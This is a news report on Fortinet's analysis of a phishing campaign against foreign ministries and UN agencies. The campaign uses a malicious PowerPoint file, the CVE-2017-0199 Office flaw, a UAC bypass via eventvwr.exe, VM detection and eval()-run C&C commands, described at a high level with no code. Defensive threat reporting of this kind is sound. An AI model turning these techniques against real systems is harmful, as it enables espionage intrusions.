Fortinet security experts warn that hackers are exploiting malicious PowerPoint files alongside recently patched Microsoft Office vulnerability to attack foreign ministries, international organizations, UN agencies, and entities interacting with international governments.
The attackers use a file called ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx and exploit the CVE-2017-0199 vulnerability which Microsoft addressed in April. During that time, cyber criminals had been abusing CVE-2017-0199 for delivering various type of malware like Dridex, Latentbot, Godzilla, and WingBird. Despite being patched recently, the exploit continues to be used in cyber attacks.
The first PowerPoint attacks which exploited CVE-2017-0199 for malware delivery were registered a month ago. They were associated with the distribution of a Trojanized version of the REMCOS legitimate and customizable remote access tool (RAT).
Besides, the exploit is capable of bypassing the User Account Control feature in Windows by hijacking the registry, and then executing eventvwr.exe. The bypass technique was first detailed about a year ago.
In addition, the script tries to identify if it runs in a virtual environment. In case it doesn’t find a virtual machine, the script continues sending some data to a remote server.
The experts say that despite the fact that the command and control (C&C) server had been already taken down at the time of their analysis, the response from the C&C contains arbitrary commands executed with eval() function. Once the commands get executed, the script sends a notification to the server.
“These commands can possibly be download functions to deliver the final payload, and the most commonly used malware for espionage are RATs (Remote Access Trojans),” Fortinet experts say.